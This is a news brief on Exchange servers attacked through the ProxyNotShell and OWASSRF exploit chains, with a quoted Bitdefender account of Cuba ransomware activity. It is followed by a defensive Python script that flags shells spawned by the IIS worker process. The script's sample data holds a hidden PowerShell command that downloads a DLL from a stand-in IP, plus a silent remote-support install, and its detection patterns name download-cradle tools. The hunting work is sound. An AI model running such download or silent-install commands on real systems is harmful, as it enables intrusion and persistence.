ProxyNotShell exploit chains in the wild.
N2K, Jan 24, 2023

Microsoft Exchange servers are under attack.

Bitdefender has observed an increase in attacks using the ProxyNotShell and OWASSRF exploit chains to target Microsoft Exchange servers.

Thousands of servers still vulnerable.

ProxyNotShell and OWASSRF are exploit chains that combine CVE-2022-41080 and CVE-2022-41082 to perform server-side request forgery (SSRF) against Exchange servers. Once the SSRF succeeds, an authenticated user can escalate access and achieve remote code execution on the server.

BleepingComputer reported earlier this month that more than 60,000 Exchange servers are still vulnerable to these attacks.

Opportunistic attacks by ransomware gangs.

Bitdefender describes several recent attacks using these exploit chains, including one by the Cuba ransomware operation:

“In this case, threat actors used the ProxyNotShell exploit chain to execute PowerShell commands. Initially, they tried to download the komar<xx>.dll, which we identified as the Bughatch downloader. Bughatch is known to be used in Cuba ransomware operations, but our attribution is mostly based on many known IOCs and reused infrastructure. After download commands were blocked, they proceeded with the unattended (silent) installation of the GoToAssist tool. GoToAssist is a legitimate remote support software from LogMeIn Inc.”

Bitdefender notes that most of these attacks targeted entities in the United States, along with companies in Poland, Austria, Kuwait, and Turkey.
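The behaviour Bitdefender describes (the Exchange server running PowerShell that first fetches a DLL and then silently installs a remote-support tool) gives defenders a concrete hunting heuristic. The following is an added example, not code from Bitdefender or Microsoft: it triages constructed process-creation events and assumes the telemetry records the parent image, so that shells spawned by the IIS worker process w3wp.exe (the process in which Exchange's web endpoints run) can be isolated from ordinary administrator activity.

```python
import re
from typing import Dict, List

# Constructed process-creation events in a hypothetical pipe-separated format
# (timestamp|host|parent_image|child_image|command_line); not real telemetry.
SAMPLE_EVENTS = """\
2023-01-20T10:01:02Z|EXCH01|w3wp.exe|powershell.exe|powershell -nop -w hidden -c "Invoke-WebRequest http://198.51.100.7/komar12.dll -OutFile C:\\Windows\\Temp\\komar12.dll"
2023-01-20T10:03:44Z|EXCH01|w3wp.exe|powershell.exe|powershell -c "Start-Process .\\GoToAssist_Installer.exe -ArgumentList '/S'"
2023-01-20T10:05:10Z|EXCH01|explorer.exe|powershell.exe|powershell -c Get-Date
2023-01-20T10:06:00Z|WKS07|outlook.exe|excel.exe|excel.exe report.xlsx
"""

# Exchange's web endpoints run inside IIS, so post-exploitation command execution
# typically appears as the IIS worker process spawning a shell. Assumption of this
# example: the telemetry records the parent image name.
WEB_WORKER = "w3wp.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOAD_RE = re.compile(r"invoke-webrequest|downloadfile|downloadstring|certutil|bitsadmin", re.I)
# Common silent/unattended installer switches: /S, /silent, /quiet, /q (or with a dash).
SILENT_RE = re.compile(r"(?:^|[\s'\"])[/-](?:s|silent|quiet|q)(?:[\s'\"]|$)", re.I)
REMOTE_SUPPORT = ("gotoassist",)  # extend with other remote-support tools as needed


def triage(events: str) -> List[Dict[str, str]]:
    """Return one finding per shell spawned by the IIS worker, tagged with why it matters."""
    findings = []
    for line in events.splitlines():
        if not line.strip():
            continue
        ts, host, parent, child, cmd = line.split("|", 4)
        if parent.lower() != WEB_WORKER or child.lower() not in SHELLS:
            continue
        reasons = ["shell_from_iis_worker"]
        if DOWNLOAD_RE.search(cmd):
            reasons.append("download_cradle")
        if any(tool in cmd.lower() for tool in REMOTE_SUPPORT) and SILENT_RE.search(cmd):
            reasons.append("silent_remote_support_install")
        findings.append({"time": ts, "host": host, "cmd": cmd, "reasons": ",".join(reasons)})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["time"], finding["host"], finding["reasons"])
```

The two EXCH01 events spawned by w3wp.exe are flagged (the first as a download cradle, the second as a silent remote-support install), while the interactive PowerShell session and the workstation event are ignored.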